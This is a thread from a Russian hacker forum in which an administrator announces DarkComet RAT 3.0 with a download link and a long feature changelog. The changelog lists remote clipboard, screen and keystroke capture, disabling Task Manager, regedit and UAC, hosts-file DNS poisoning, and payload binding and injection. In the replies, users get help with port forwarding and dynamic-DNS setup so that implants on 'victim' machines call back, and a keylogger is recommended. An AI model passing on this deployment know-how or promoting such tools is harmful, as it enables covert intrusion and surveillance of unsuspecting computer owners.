1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

DarkComet-RAT 3.0

Тема в разделе "RATs|:|Backdoors", создана пользователем onthar, 22 ноя 2010.

  1. onthar
    onthar Команда форума Админ
    Симпатии:
    396
    Этого ждали все и долго. Долгожданный релиз от DarkCoderSc

    [+] Множество изменений
    DarkComet 3.0 List improvement
    ------------------------------
    By DarkCoderSc

    - 09/10/2010 : RC4 traffic encryption done , its encrypt all plain text and data flux with a RC4 encryption 256 bit , all your private data are now totally secured and DarkComet is impossible to flood / exploit .
    - 09/10/2010 : Dynamic RC4 256 bit Key added when you choose a password on DarkComet , thats mean if you want to be secured at 200% when you choose a password in server it will bind the actual RC4 key with your
    password then without the correct client password the data wont be correctly decrypted then nothing will work without your password.
    - 09/10/2010 : Now edit server settings are totally encrypted in RC4 256 bit too then its no more possible to reverse and read your personnal settings , again you are totally secured now ;)
    - 10/10/2010 : New column added in connection list (SIN) , now you can see the RAM usage/Total RAM and Free RAM.
    - 10/10/2010 : New column added in connection list (SIN) , now you can see the country code/country localisation(geo) and the default system langage
    - 10/10/2010 : New column added in connection list (SIN) , now you can see the first execution data/time of the server if it just been executed and not installed it display the current date/time.
    - 10/10/2010 : Now you can choose if you want to display the default language flag or the geo ip flag :)
    - 10/10/2010 : In OS collumn windows installed drive added (its where windows was installed)
    - 12/10/2010 : Clipboard manager have been recoded , now you can resize the textbox and listview for a better confort
    - 12/10/2010 : Two functions added in Clipboard manager , get the remote clipboard text in your clipboard , and send your clipboard text to the remote clipboard.
    - 12/10/2010 : Process Manager got now a real better compatibility on 64 bit OS, now it list all process :)
    - 12/10/2010 : Process Manager list the process 3x faster.
    - 12/10/2010 : If you use a password for protecting connection it will be display in tray icons with a locker to remind you ! ;)
    - 16/10/2010 : New toast style made , now you it display more information and have a better design.
    - 16/10/2010 : Clipboard copy problem fixed in password manager , also the whole system is more stable now.
    - 30/10/2010 : New edit server design fixed and recoded at 100% , more fast , more stable , more options.
    - 30/10/2010 : New profile save/load system with many options possibility's such as Encrypt/Decrypt your custom profile with password
    - 30/10/2010 : Ultra verbose system added on edit server.
    - 30/10/2010 : Edit server doc started.
    - 31/10/2010 : Now you can test if the connection will be successfully established with verbose (it test localhost/lan and WAN)
    - 07/11/2010 : Now disable/enabled taskmanager works like a charm for all Windows without beeing administrator.
    - 07/11/2010 : Now disable/enabled registry (regedit) works like a charm for all Windows without beeing administrator.
    - 07/11/2010 : Disable UAC added to server shield
    - 07/11/2010 : DNS Poisoning added in edit server , you can add some dns rules in hosts file very easily and also clean the whole host file before applying your custom changes
    - 11/11/2010 : Icon Pack with list added in the new Edit server , you can also drop some new icon in the Icons folder they will apear then in the list
    - 12/11/2010 : Binder totally recoded and use now his own ressource section
    - 12/11/2010 : Now in file binder you can choose if you want the file(s) to be drop in temp folder and executed or if you want them to be inject to default browser directly from resource without extracting it
    - 12/11/2010 : Edit server plugins system done, now you can code your own plugins that will be load at server startup, the system is safe threaded (It wont block the main application).
    - 14/11/2010 : New screen capture, more fast, more stable and new settings
    - 14/11/2010 : Now screen capture control functions are safe threaded then more fast
    - 14/11/2010 : Now you can choose interval capture for screen capture
    - 14/11/2010 : Now you can automaticaly save snapshots like for webcam
    - 14/11/2010 : Now batch commands works even if UAC enabled
    - 14/11/2010 : Now VBS commands works even if UAC enabled
    - 14/11/2010 : New function added in control center / fun section : Microsoft reader allow you to make speak the remote computer
    - 16/11/2010 : Screen capture speed improved and comsume less CPU and RAM, also now it compare the previous picture with the new one in less than 10Ms :)
    - 16/11/2010 : Some part of the design had been refund, more compatible for Linux Wine, Windows 2000 and WinXP Classic theme also the design is more pro
    - 20/11/2010 : Trace route tab had made a fusion with trace map , stability improved it doesn't use browser anymore it is only a PNG picture and you can choose the size , zoom of this picture.
    - 20/11/2010 : Unremote webserver trace route ip module updated to v2.0
    - 20/11/2010 : A small SIN connection thumnail issue fixed
    - 20/11/2010 : CPU/RAM monitor GUI as changed it is more clean, and have nice progressbar colours ;) (for Vista and Windows 7 only) on XP and lower it will be normal progress bars.
    - 20/11/2010 : Two buttons added in Html scripting, batch scripting and visual basic scripting (Past clipbaord code and copy code to clipboard)
    - 20/11/2010 : Msn control tab better design
    - 20/11/2010 : Multithread file downloader design is now better and also you can now clear the downloaded items but all current download must been finished first.
    - 20/11/2010 : SIN Form design had changed now it is more pro , better for the eyes.
    - 20/11/2010 : General Settings panel change , i remove the SIN settings & General settings and make a fusion of the both its more clear.
    - 20/11/2010 : Now you can hide/show local files in File Manager
    - 20/11/2010 : New function added in system functions (control center) you can now get the remote hosts file and edit it (Require Admin state - UAC)
    - 21/11/2010 : Server downloader added in Edit Server menu popup, the downloader is coded in ASM then size = 2ko before editing and few byte more after edit cause of the setting
    The downloader code is open source.
    - 21/11/2010 : New function added in File Manager , called Run file > Injected to default browser , it will inject the file to default browser (32bit) and load it (Works on 64bit if the file to run is 32bit)

    [свернуть]

    [+] Пачка скринов
    [​IMG]


    [​IMG]


    [​IMG]
    [свернуть]


    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 5 or greater.**
    Теперь утилита стала надежней, функциональней, стабильней.
    Ее использование не как трояна, а как утилиты для удаленного администрирования оправдано, удобно удаленно лечить инфицированные машины клиентов. Это не ирония, утилита действительно удобна.

    [+] Видео руководство и демонстрация
    По порядку:
    Настройка и билд сервера.
    Демонстрация работы бэкдора.
    Процесс лечения системы после инфекции.
    [свернуть]



    Багфиксовый релиз 3.0.1
    Исправлены следующие ошибки:
    Код:
    - [Server startup]Now server module install correctly in Windows and System dir (if user got privileges).
    - [Edit Server] Server generation is now 50x faster and safe threaded
    - [Edit Server] File binder , Plugins disabled for EOF mode (only), it was corrupting the EOF settings, use RES mode to bind/add plugins to server, the rest still working fine with EOF mode.
    - [File Manager] No more random errors when browsing files
    - [File Manager] Now even if you browse large amount of files, for example system32 it will works fine without any problems
    - [File Manager] Now you can put arguments when you run a file (SHOW and HIDDEN)
    - [Fun reader] No more error display if it fail
    - [Edit Server] Plugins error managed
    - [Mistakes, Small bug fixed] Some mistakes fixed also other small bugs
    Скачать:
    http://www.darkcomet-rat.com/process_download.php?id=2
     
    Последнее редактирование: 12 дек 2010
    22 ноя 2010
  2. serg2020
    serg2020 Новичок
    Симпатии:
    0
    Это урезанная или полная версия?
     
    27 ноя 2010
  3. chimatii
    chimatii Глобальный модератор
    Симпатии:
    101
    ссылка на офф. сайт вроде) а там ничего не написано насчет урезки
     
    27 ноя 2010
  4. onthar
    onthar Команда форума Админ
    Симпатии:
    396
  5. Rebel
    Rebel Новичок
    Симпатии:
    0
    и как в работе он?

    Добавлено через 23 минуты
    а кейлоги всегда будут такими карявыми с кирилицы?
     
    Последнее редактирование: 8 дек 2010
    8 дек 2010
  6. onthar
    onthar Команда форума Админ
    Симпатии:
    396
    да, так случилось, что забугорные программисты не имеют дело с кириллическими системами, по этому им не обязательно из поддержка.

    лучше сам потести
     
    8 дек 2010
  7. Rebel
    Rebel Новичок
    Симпатии:
    0
    посоветуйте хороший надежный кейлогер или все же есть возможность распозновать то что он присылает написанное на кирилице?

    Добавлено через 50 минут
    ещё вот такой вопрос когда прописываешь при настройке серва акк no-ip и делаешь тест, по локальным ip (первые две строчке в тесте) горят зеленым, т.е. он открывает порт, а через днс ака no-ip (последняя строчка) выдает красным - "was not successfully connected to port: 1604", т.е. с инета этот порт не открывается..
    у меня инет идет через связку адсл модем + вайфай роутер, сразу подумал про форвардинг портов, все везде проставил на 1604, но увы..
    потом попробовал указать порт 8080 с ним работает... что думаете, по этому поводу? нужно порт все таки прокидывать 1604, или можно оставить 8080?

    Добавлено через 54 минуты
    Localhost was successfully connected to port: 1604
    LAN (192.168.2.2) was successfully connected to port: 1604
    *****.zapto.org was not successfully connected to port: 1604

    у меня модем адсл 192.168.1.1, роутер в сети с ним под 192.168.1.2
    потом роутер открывает вай фай, тут у роутера 192.168.2.1, а у компа 192.168.2.2
    не понимаю может порты прокидываю не правильно... как в такой ситуации надо сделать?

     
    Последнее редактирование модератором: 9 дек 2010
    8 дек 2010
  8. onthar
    onthar Команда форума Админ
    Симпатии:
    396
    Подсети разные.

    можно оставить 8080, главное чтобы на машине с запущенным клиентом он не был занят другой программой.
     
    8 дек 2010
  9. onthar
    onthar Команда форума Админ
    Симпатии:
    396
    можно не оффтопить? Обсуждение кейлоггеров у нас в специально отведенном для них разделе. По сабжу - ardamax кириллицу поддерживает.
     
    9 дек 2010
  10. Rebel
    Rebel Новичок
    Симпатии:
    0
    такой вопрос по работе программы... создал сервер на машине где находится клиент, запустил сервер, для того чтобы оценить как он запишется в систему и как будет работать, после перезагрузки, комп долго думал... заметно долго.. потом захожу в клиент, и он не видет сервера установленного на этой же машине, что можете сказать по этому поводу?
     
    10 дек 2010
  11. onthar
    onthar Команда форума Админ
    Симпатии:
    396
    проверяйте наличие файла в системе и в автозагрузке, может сервер умер.
     
    10 дек 2010
  12. Rebel
    Rebel Новичок
    Симпатии:
    0
    нет он установился и живет, может он использует порт и блокирует его для использования программой клиентом? такое может быть?
     
    10 дек 2010
  13. onthar
    onthar Команда форума Админ
    Симпатии:
    396
    Значит он не может подключиться из-за неверных настроек клиента, установленного файервола или антивируса в системе жертвы.
    В настройках сервера какой айпи-адрес был указан?
    И какой порт?
     
    10 дек 2010
  14. Rebel
    Rebel Новичок
    Симпатии:
    0
    был указан днс сервиса no-ip... при тесте все потом нормально работало, порт 1604
     
    10 дек 2010
  15. redstarus
    redstarus Новичок
    Симпатии:
    0
    да такая же проблема с днс и роутером... Что делать?
     
    10 дек 2010
  16. Rebel
    Rebel Новичок
    Симпатии:
    0
    а вообще себя заражая ты получишь доступ к себе самому? Потому что я попробовал заразить себя вот этим трояном... он себя не увидел в клиенте, потом переустановил винду и на чистую винду с отключенным фаерволом и без антивира установил синрат 4.0 и нифига... onthar вы проверяли можно ли себя заражать? почему не видно тогда? вот я уже писал в топике про радмина, что скинул парню и этого троя и синрат 4.0 и радмина и ничего не получилось, хотя программы встали и порты я прослушивал те что нужно.. там какие ещё особенные настройки в клиенте то.. 4 часа убил пытаясь увидеть его сервера, никак....
     
    Последнее редактирование: 10 дек 2010
    10 дек 2010
  17. Iindigo
    Iindigo ВестникЪ Продвинутый
    Симпатии:
    69
    Я ответил вам в том топе, напишу и здесь. Вы не видите самого себя, т.к. сидите за NATом.

    Да вы, молодой человек, садо/мазо. Так и зрение можно посадить, шутка ли, 4 часа пытаться увидеть невидимое! :laughing:
     
    10 дек 2010
  18. Rebel
    Rebel Новичок
    Симпатии:
    0
    нет ну правда Iindigo почему тогда я не могу увидеть собственную машину ? я конечно это как вы выразились "садо мазо" (причем я с этим согласен) буду заканчивать, проведу тесты на других машинах, у которых иные способы входа в интернет, но разве бэкдуры не для того чтобы задача сводилась к их установке на комп, и дальнейшего наблюдения за ними, а тут получается ладно задачу с форвардингом портов у себя я решу, а вот у удаленной машины как... в маршрутизаторах копаться? или вы считаете что провайдер вообще всех своих клиентов от этого защитил? мне на самом деле остается непонятным этот вопрос, проблема по идее должна быть в одной машине, на другой где сервер установлен уже должен идти сигнал, который можно слушать... или вы считаете что его нат не выпускает сигнал, по идее такого не может быть как мне кажется, они препятствуют входящим пакетам..
     
    11 дек 2010
  19. Iindigo
    Iindigo ВестникЪ Продвинутый
    Симпатии:
    69
    В случае с бекдором, проблема с НАТом может возникать, только если принимающая сторона не имеет белого IP.

    Сейчас будет более популярно...
     
    11 дек 2010
  20. Iindigo
    Iindigo ВестникЪ Продвинутый
    Симпатии:
    69
    [​IMG]
     
    11 дек 2010

Поделиться этой страницей

Загрузка...